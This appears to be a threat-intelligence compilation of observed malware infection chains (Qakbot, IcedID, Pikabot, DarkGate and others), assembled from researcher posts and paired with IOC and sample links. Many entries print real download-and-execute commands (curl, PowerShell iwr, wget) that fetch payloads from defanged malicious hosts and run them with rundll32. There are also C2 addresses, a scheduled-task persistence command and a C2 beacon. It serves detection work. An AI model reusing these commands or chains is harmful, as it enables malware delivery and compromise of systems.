Top 50 Techniques & Procedures
url > .zip > .js > .dll
#Pikabot - #TA577 - url > .zip > .js > .dll
https://twitter.com/Cryptolaemus1/status/1709933199785418797
wscript PO_13670.js
cmd /c mkdir C:\ProgramData\LimdD\
WinHttp https://superrrdental.]com/H6F/dshjdsjkkd C:\ProgramData\LimdD\laminos.dll
rundll32.exe C:\ProgramData\LimdD\laminos.dll, HUF_inc_var
IOC's https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_05.10.2023.txt
url > .zip > .lnk > curl > .dll
#Pikabot- #TA577 - url > .zip > .lnk > curl > .dll
https://twitter.com/Cryptolaemus1/status/1709238615904018605
cmd /c TZZ.pdf.lnk
curl http://207.246.78.]68/6kQh/T7t -o UL.log
rundll32 UL.dll, HUF_inc_var
c2's 167.86.96.]3:2222 38.242.240.]28:1194 167.86.81.]87:2222 79.141.175.]96:2078 209.126.9.]47:2078
IOC's https://github.com/pr0xylife/Pikabot/blob/main/Pikabot_03.10.2023.txt
url > .zip > .lnk > curl > .vbs > curl > au3 > .exe
#DarkGate - #TA577 - url > .zip > .lnk > curl > .vbs > curl > au3 > .exe
https://twitter.com/Cryptolaemus1/status/1708869147688419507
cmd /c MFGT.lnk
curl http://136.244.92.]148/rdFR2/GbB -o fjw.vbs
wscript fjw.vbs
cmd /c mkdir c:\rqdp
curl http://81.19.135.]17:2351 -o nvptjf.au3
Autoit3.exe nvptjf.au3
IOC's https://github.com/pr0xylife/DarkGate/blob/main/DarkGate_01.10.2023.txt
url > .zip > lnk > .vbs > .exe
#DarkGate - #TA577 - url > .zip > lnk > .vbs > .exe
https://twitter.com/Cryptolaemus1/status/1708869147688419507
url > .xll > curl > .dll
#IcedID - #TA577 - url > .xll > curl > .dll
https://twitter.com/Cryptolaemus1/status/1706635492224024765
EXCEL.EXE Sr.xll
cmd /c curl -o c:\users\public\9y.dat http://135.125.177.]95/syK/3IldTx
rundll32 c:\users\public\9y.dat scab /k besogon728
Samples 👇
https://bazaar.abuse.ch/sample/310b9b7f54880f2142882e39637d73dfc8542eab06ac1bb9ec597b801979b4d8/
https://bazaar.abuse.ch/sample/f45d0303851f913cef47b612211d603449cedaab4df3484048c8473b9d71d96a/
IOC's https://github.com/pr0xylife/IcedID/blob/main/icedID_09.26.2023.txt
pdf > url > .js > ps > .dll
#Qakbot - BB32 - pdf > url > .js > ps > .dll
https://twitter.com/Cryptolaemus1/status/1669669651486240769
wscript Cx.js
powershell $res = "http://149.154.158.]191/znxlW/MGjrJji3RDB"; foreach ($Fo in $res) try {$Go = FromBase64($Fo)); iwr $Go -O C:\ProgramData\99.9.dll
rundll32 C:\ProgramData\99.9.dll,must
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB32_16.06.2023.txt
.pdf > .zip > curl > .dll
#Qakbot - obama268 - .pdf > .zip > curl > .dll
https://twitter.com/Cryptolaemus1/status/1669024540482052103
wscript CalculationOfCosts-1337.js
cmd.exe /c mkdir C:\Koltes\Fertiol & curl https://rapiska.]com/1337dat --output C:\Koltes\Fertiol\Floster.OCX
rundll32 C:\Koltes\Fertiol\Floster.OCX,must
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama268_14.06.2023.txt
url > .zip > .js > curl > .dll
#Qakbot - BB32 - url > .zip > .js > curl > .dll
https://twitter.com/Cryptolaemus1/status/1668965414867443712
wscript.exe docu_DF631_Jun_14_1.js
curl.exe -o c:\users\public\amounted.tmp http://192.121.17.]149/QmVep/DB278
conhost.exe rundll32.exe amounted.tmp,must
rundll32.exe amounted.tmp,must
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB32_14.06.2023.txt
.pdf > .zip > .js > .msi > .dll
#Qakbot - obama266 - .pdf > .zip > .js > .msi > .dll
https://twitter.com/Cryptolaemus1/status/1664300425829404673
wscript.exe ProjectFunding_1337_Jun01.js
msiexec.exe /V
rundll32.exe C:\Users\Admin\AppData\Local\AdobeAcrobatPDFBrowserPlugin\main.dll,next
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama266_01.06.2023.txt
BB19 - .html > url > .js > .ps > .dll
#Pikabot - #Qakbot- BB19 - .html > url > .js > .ps > .dll
https://twitter.com/pr0xylife/status/1636402413912354816
wscript.exe LL.js
$Mag = (https://hanika-inc.]com/mjnPR9/uo)
foreach ($washman in $Mag) {try {Invoke-WebRequest $washman -O $env:TEMP\Sulfuryl.dll
rundll32 $env:TEMP\Sulfuryl.dll,LS88
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB19_Pikabot_16.03.2023.txt
.pdf > .zip > .wsf > xmlhttp > .dll
#Qakbot - obama264 - .pdf > .zip > .wsf > xmlhttp > .dll
https://twitter.com/Cryptolaemus1/status/1661413082982170628
wscript.exe Claim_C736.wsf
var u = "http://45.76.58.]72/a0UFMZnC6ltxphw.dat" http://http.open("GET", u[i], false)
conhost.exe rundll32.exe C:\Users\Public\amLE5PKlGAXrhpU.dat,bind
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama264_24.05.2023.txt
.one > .iso > .chm > ps > .dll
#Qakbot - BB24 - .one > .iso > .chm > ps > .dll
https://twitter.com/Cryptolaemus1/status/1648632165742137344
hh E:\README-JRN44.chm
powershell $sensillum = ("https://hotellosmirtos.]com/sjn/Tn0Q3nieE")
foreach ($form in $sensillum) {try {wget $form -O $env:TEMP\hexatetra
rundll32 $env:TEMP\hexatetra,Motd
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB24_19.04.2023.txt
.one > .img > .wsf > ps > .dll
#Qakbot - BB22 - .one > .img > .wsf > ps > .dll
https://twitter.com/Cryptolaemus1/status/1643614470164340736
#Qakbot - BB22 - .pdf > .zip > .wsf > ps > .dll
wscript AprilDetails.wsf
powershell $spear = ("https://kmphi.]com/FWovmB/8oZ0BOV5HqEX")
foreach ($banter in $spear) {try {wget $banter -O $env:TEMP\Lownesses
rundll32 $env:TEMP\Lownesses,X555
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB22_05.04.2023.txt
url > .js > ps > .dll
#Qakbot - BB33 - url > .js > ps > .dll
https://twitter.com/Cryptolaemus1/status/1671489179262369792
wscript Ix.js
powershell -encodedcommand $N = "http://151.236.14.]60/c1oHe/q9cRd2n0"
md C:\ProgramData\SNWSlycop
iwr $Brunt -O C:\ProgramData\SNWSlycop\joind.dll
rundll32 C:\ProgramData\SNWSlycop\joind.dll
IOC's https://github.com/pr0xylife/Qakb
Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL
Thread-hijacked email -> PDF Attachment -> payload download -> Password-Protected Zip -> ISO -> LNK -> CMD -> DLL c2: ebothlips.com
https://twitter.com/k3dg3/status/1612860949773389835
Today's #IcedID "1421378695" dropped via PDFs with payloads hosted on firebasestorage.googleapis.com.*
https://bazaar.abuse.ch/sample/1796aef0940e800bcb2556782f92a7874422bbdfdda24e6658e43db4b0916850/
hijacked emails > PDF > Cookie Reloaded URLs (prometheus tds)-> JS > payload via CURL > IcedID
https://twitter.com/k3dg3/status/1697331227940798731
#IcedID "4240553492" rolling in
c2: oopscokir.com ProjectID: 4240553492
filename: inv_ug_08-31_[0-9]{3,5}.pdf Curl payload ex: hxxps://avestainfratech.com/out/t.php
tldr: hijacked emails > PDF > Cookie Reloaded URLs (prometheus tds)-> JS > payload via CURL > IcedID
email > PDF > URL > Keitaro redirect > zip > pass > exe
https://twitter.com/k3dg3/status/1683544196341219341
Incoming #IcedID "1561373935" filename: inv-details-jul23.pdf
Loader C2: filtaferamoza.com
email > PDF > URL > Keitaro redirect > zip > pass > exe
https://tria.ge/230724-w1dlaaha6w/behavioral1
https://bazaar.abuse.ch/sample/8b5529d29aeaf195889ebad68f2c3a390845e173edfec923acaf25fed824a529/
url > zip > lnk url > xll pdf > url > xll > msi
https://twitter.com/pr0xylife/status/1705331101365891455
#TA577 - Back on the scene pushing #Darkgate
Time to resume tracking operations, welcome back Tramp.
Distro 👇
url > zip > lnk url > xll pdf > url > xll > msi
Samples 👇
https://bazaar.abuse.ch/sample/026f4c95783ed33bc31c16a9a80842fa4a8efa4f67dff5a4739f90a8bc49a219/
https://bazaar.abuse.ch/sample/2eee7af95e457c97fb0bc3a91a00931c3c33e72f864e9bf4289565cba15ae484/
https://bazaar.abuse.ch/sample/bb2434f22b2fb7801cdd2b81e2b28a41a2beb2dc72b3d07ffec0e0f120c7a4bf/
https://bazaar.abuse.ch/sample/5bc060bd720757919db4f54f97e74b7110c67cf934423f86ffd483c7e2c367e2/
.zip > .doc > .dll
#Emotet- epoch4 - .zip > .doc > .dll
https://twitter.com/pr0xylife/status/1633096910008467459
WINWORD.EXE /n INVOICE 589 03_23.doc /o
https://midcoastsupplies.]com].au/configNQS/Es2oE4GEH7fbZ/?135704
regsvr32.exe C:\Windows\system32\MSBjdGgEfuEG\evPaAyJzdCSx.dll
IOC's https://github.com/pr0xylife/Emotet/blob/main/e4_emotet_07.03.2023.txt
.pdf > .url > .zip > .iso > .cmd > .exe
#IcedID - .pdf > .url > .zip > .iso > .cmd > .exe
https://twitter.com/pr0xylife/status/1616464950138109953
#IcedID - .pdf > .url > .zip > .iso > .lnk > .cmd > .dll
cmd.exe /c REF_Document.lnk
cmd.exe /c sacsimsapI.cmd
rundll32 standing.dat,init
c2's
http://umousteraton.]com
Samples here 👇
https://bazaar.abuse.ch/sample/3390b1d8560f565ed5e2a60df63ce24abe0ef3da514cf5645dd732f7e5cdbbae/
https://bazaar.abuse.ch/sample/ad174760985c5418b4a3c3a97cd8d7658e3bbb7030f72f2eff9ff97e57f200bd/
IOC's https://github.com/pr0xylife/IcedID/blob/main/icedID_20.01.2023.txt
url > .zip > .one > .hta > .curl > .dll
#Qakbot - BB12 - url > .zip > .one > .hta > .curl > .dll
https://twitter.com/pr0xylife/status/1620751340485120001
mshta Open.hta
curl -o C:\ProgramData\index.png --url billmanagersystem.]com/ikA/d.gif
rundll32 C:\ProgramData\index.png,Wind
Samples 👇
https://bazaar.abuse.ch/sample/6c49b4d40b2925a4e5910e4157f7d302acf9203192187d3d1d178c258239f1c3/
https://bazaar.abuse.ch/sample/284f0fabbdfc1172cb1cbf74473321668c4b31789d93158669f6735bec124817/
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB12_01.02.2023.txt
.pdf > .zip > .js > .dll
#Qakbot - obama270 - .pdf > .zip > .js > .dll
https://twitter.com/Cryptolaemus1/status/1671528958192496640
wscript RrwuR.js
powershell -enc $bread = "https://viltare.]com/PlI6qXoN.dat"
md C:\ProgramData\SNWSPinna
iwr $Medio -O C:\ProgramData\SNWSPinna\Pinna.dll
rundll32 C:\ProgramData\SNWSPinna\Pinna.dll
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_obama270_21.06.2023.txt
url > .zip > .vhd > .lnk > .cmd > .cmd > .dll
#Qakbot - BB09 - url > .zip > .vhd > .lnk > .cmd > .cmd > .dll
https://twitter.com/pr0xylife/status/1599787375311212544
cmd /c HG.lnk
cmd.exe /q /c pests.cmd
cmd.exe /K dispersers.cmd system rundl
rundll32 erect.tmp,DrawThemeIcon
Samples 👇
https://bazaar.abuse.ch/sample/15c1feb12ecedafc233ebec6e0893ed0294f91ad48da9cc89c571ce3e316980d/
https://bazaar.abuse.ch/sample/c6887e515b36694e8e738c0df7610014e084bcce80ee13c998087471daf039a4/
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB09_05.12.2022.txt
url > .zip > .xlsb > .dll
#Qakbot - bb - url > .zip > .xlsb > .dll
https://twitter.com/pr0xylife/status/1577671455336194049
CreateDirectoryA C:\Hefagga
CreateDirectoryA C:\Hefaggad\Ukdfaovkga
http://metroberrylocalmarketing.]com/7z8b/0.html
regsvr32 /s calc
regsvr32 C:\Hefaggad\Ukdfaovkga\Buuefafa.dll
https://bazaar.abuse.ch/sample/d3788e69dd125449af3d985de93701c49cef0658bc98e3b449185f86cbee027d/
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_05.10.2022.txt
.html > .zip > .iso > .lnk > .png > .dll
#IcedID - .html > .zip > .iso > .lnk > .png > .dll
https://twitter.com/pr0xylife/status/1575903382505590784
cmd.exe /c start ru^n^d^l^l3^2 2cdb83ee-c76c-4d7c-b9bc-2f4aab08f773.-Tf,PluginInit
rundll32 2cdb83ee-c76c-4d7c-b9bc-2f4aab08f773.-Tf,PluginInit
https://bazaar.abuse.ch/sample/0ab12d65800f3e7e6089fe3c534911f0b42d9175bcf955e937edd39e8bb2c13a/
c2 http://triskawilko.]com
IOC's https://github.com/pr0xylife/IcedID/blob/main/icedID_30.09.2022.txt
url > .zip > .lnk > curl > wscript > curl > .dll
#Qakbot - bb - url > .zip > .lnk > curl > wscript > curl > .dll
https://twitter.com/pr0xylife/status/1570064310923304962
MD "C:\ProgramData\A_Np\fcA"
curl.exe -o %ProgramData%\A_Np\fcA\GCk.js ap2web.]com/MwS/13.html
wscript.exe GCk.js
paritoys.]com/9nD/130.html
regsvr32 REPORT_9MyMg_.SRm.IH.dll
IOC's https://github.com/pr0xylife/Qakbot/blob/main/Qakbot_BB_14.09.2022.txt
.zip > .docm > .curl > .dll
#IcedID - .zip > .docm > .curl > .dll
https://twitter.com/pr0xylife/status/1565354363765215238
cmd /c curl http://193.178.210.]58/-o c:\ProgramData\MH4SG6MYDDyi.dll && rundll32 c:\ProgramData\MH4SG6MYDDyi.dll,#1
https://bazaar.abuse.ch/sample/133245a337b1703f3940d8ca3907c9bb7ec6b47701257766e70d7c9318571ce5/
c2 http://donorcabr.]com/
IOC's https://github.com/pr0xylife/IcedID/blob/main/icedID_01.09.2022.txt
EML>.tar.gz>.exe
https://twitter.com/Tac_Mangusta/status/1709107786078982211
EML>zip pw>.url>SMB>zip>vbs>certutil
EML>zip pw>.url>SMB>zip>vbs>certutil>#Ursnif
https://twitter.com/JAMESWT_MHT/status/1706919214588506202
pec > .zip > .url > .exe (smb)
https://twitter.com/Tac_Mangusta/status/1703716708236570650
Mail(stolen old conv) > .zip > .js > .7z (psw) > .dll(key)
https://twitter.com/Tac_Mangusta/status/1702247512529060244
USB > .lnk > .ps1 > .exe
https://twitter.com/Tac_Mangusta/status/1678185981344731137
LZH > EXE
https://twitter.com/reecdeep/status/1696539420219056590
Phish -> .rar -> .cmd -> .ps1 -> AutoIT -> force shutdown -> autorun persistence leading to execution of Metamorfo DLL's
Phish -> .rar -> .cmd -> .ps1 -> AutoIT -> force shutdown -> autorun persistence leading to execution of #Metamorfo DLL's
https://twitter.com/0xToxin/status/1694756006889206044
Bumblebee
#Bumblebee Infection Flow TTPs🐝
[+] Mark-of-the-Web Bypass: IMG (T1553.005)
[+] Malicious File: LNK (T1204.002)
[+] Windows Command Shell: BAT (T1059.003)
[+] Rename System Utilities: copy & rename (T1036.003)
[+] Scheduled Task: schtasks.exe (T1053.005)
[+] Rundll32 (T1218.011)
https://twitter.com/Max_Mal_/status/1600847676270006272
HTML to PluginInit
[+] HTML Smuggling (T1027.006)
[+] Msiexec - .msi stager (T1218.007)
[+] Rundll32 - .dll loader (T1218.011)
[+] New export func: init, a short version of PluginInit🔥
#DFIR exec flow: msi > [RPC Install] > msiexec > rundll32
https://twitter.com/Max_Mal_/status/1600433854937866240
EML>Pdf>Url>js>url>js>url>PEDLL
https://twitter.com/JAMESWT_MHT/status/1678982791705378816
Onenote sample > Bat > curl url > Dll
https://twitter.com/JAMESWT_MHT/status/1641782661503918081
bat>certutil>exe>ps1>dropbox>2stage>certutil>fake invoice pdf
https://twitter.com/JAMESWT_MHT/status/1658785799394000898
Qakbot js
Qakbot - JS -> DLL -> Sacrificial Process WmiPrvSE
conhost => conhost.exe conhost.exe conhost.exe rundll32.exe C:\Users\alice\noises.dat,next
conhost => conhost.exe conhost.exe rundll32.exe C:\Users\alice\noises.dat,next
conhost => conhost.exe rundll32.exe C:\Users\alice\noises.dat,next
rundll32 => rundll32.exe C:\Users\alice\noises.dat,next
rundll32 => rundll32.exe C:\Users\alice\noises.dat,next
explorer C:\Windows\SysWOW64\explorer.exe
https://twitter.com/ACEResponder
Pikabot
#Pikabot execution chain:
➡️ rundll32.exe <PikaBot_payload>.dll,Test (initial execution)
➡️ WerFault.exe (connects to PikaBot C2, in our case it's 45.85.235[.]39)
➡️ whoami.exe /all
➡️ ipconfig.exe /all
➡️ schtasks.exe /Create /F /TN "{B220CD07-2339-4E8E-8FDD-DF2C6D1B42DC}" /TR "cmd /q /c start /min "" powershell "$HydrofluoboricInclaspedNonredressing = Get-ItemProperty -Path HKCU:\Software\HydrofluoboricInclaspedNonredressing; powershell -encodedcommand $HydrofluoboricInclaspedNonredressing.ParodyRoisterImpressibly"" /SC HOURLY /MO (example of the scheduled task as a persistence mechanism, the registry values and task name can change)
NOTE: whoami, ipconfig, schtasks were spawned from WerFault.exe
➡️ PowerShell execution: powershell "$HydrofluoboricInclaspedNonredressing = Get-ItemProperty -Path HKCU:\Software\HydrofluoboricInclaspedNonredressing; powershell -encodedcommand $HydrofluoboricInclaspedNonredressing.ParodyRoisterImpressibly"
➡️ PowerShell execution (child process): "powershell.exe" -encodedcommand [REDACTED] -> decoded output is provided in the screenshot
➡️ curl.exe --url hxxps://192.9.135[.]73:1194/neurophysiologist/D3CAP09duSVlX?TransitorilyVerbosities=y4EB3Rb -A upb4geF6poodkVW2YaySEzk4C32sCDV -X POST --insecure (sends the POST request out to one of the IPs in the decoded output)
➡️ powershell.exe start rundll32 $env:APPDATA\Microsoft\HydrofluoboricInclaspedNonredressing\ParodyRoisterImpressibly.dll, Test (starts the PikaBot payload)
➡️ The POST request sent to C2: {"ParodyRoisterImpressibly":"CgBzAHQAYQByAHQAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwASAB5AGQAcgBvAGYAbAB1AG8AYgBvAHIAaQBjAEkAbgBjAGwAYQBzAHAAZQBkAE4AbwBuAHIAZQBkAHIAZQBzAHMAaQBuAGcAXABQAGEAcgBvAGQAeQBSAG8AaQBzAHQAZQByAEkAbQBwAHIAZQBzAHMAaQBiAGwAeQAuAGQAbABsACwAIABUAGUAcwB0AAoA","success":"true"} (Base64-encoded string contains the command to execute the PikaBot DLL payload on the host)
https://twitter.com/AnFam17
#Qakbot DLL Side-Loading TTPs DFIR exec flow: ZIP > EXE&DLL > curl > rundll32
#Qakbot DLL Side-Loading #TTPs #DFIR exec flow: ZIP > EXE&DLL > curl > rundll32
https://twitter.com/Max_Mal_
Redirect Services
⚠️ Legitimate Services Abused For Phishing Purposes
1- Bing Redirect - https://app.any.run/tasks/9a1e55eb-05c5-499b-b995-d5ef0e275394?utm_source=twitter&utm_medium=post&utm_campaign=task1&utm_content=linktotask&utm_term=031023/
2- Google AMP - https://app.any.run/tasks/544a7608-87b2-4e37-9804-556151684be5?utm_source=twitter&utm_medium=post&utm_campaign=task2&utm_content=linktotask&utm_term=031023/
3- Microsoft Customer Voice - https://app.any.run/tasks/e239ecc0-74cf-45ed-9f15-f4a9b35fe65e?utm_source=twitter&utm_medium=post&utm_campaign=task3&utm_content=linktotask&utm_term=031023/
4- Cloudflare R2 Dev Bucket - https://app.any.run/tasks/41d192ee-95d9-4aed-a8eb-7b1819f5865c?utm_source=twitter&utm_medium=post&utm_campaign=task4&utm_content=linktotask&utm_term=031023/
https://twitter.com/anyrun_app/status/1709193919118844267
VBS -> PowerShell -> Stego Hidden Payload -> Downloader DLL -> LimeRAT
https://twitter.com/dark0pcodes